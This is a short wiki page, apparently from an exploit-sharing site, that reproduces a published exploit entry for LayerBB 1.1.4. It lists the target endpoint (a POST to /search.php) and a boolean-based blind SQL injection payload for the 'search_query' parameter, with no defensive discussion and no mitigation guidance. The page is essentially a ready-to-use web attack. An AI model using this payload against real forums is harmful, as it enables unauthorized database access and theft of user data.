LayerBB 1.1.4 SQL注入漏洞

From PwnWiki
Revision as of 17:51, 8 April 2021 by Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: LayerBB 1.1.4 - 'search_query' SQL Injection # Date: 2021-02-19 # Exploit Author: Görkem Haşin # Version: 1.1.4 # Tested on: Linux/Windows #...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

EXP

# Exploit Title: LayerBB 1.1.4 - 'search_query' SQL Injection
# Date: 2021-02-19
# Exploit Author: Görkem Haşin
# Version: 1.1.4
# Tested on: Linux/Windows

# POST /search.php HTTP/1.1
# Host: Target

Payload: search_query=Lffd') AND 8460=(SELECT (CASE WHEN (8460=8460) THEN 8460 ELSE (SELECT 1560 UNION SELECT 2122) END))-- -&search_submit=Search
Retrieved from "https://pwnwiki.com/index.php?title=LayerBB_1.1.4_SQL注入漏洞&oldid=1277"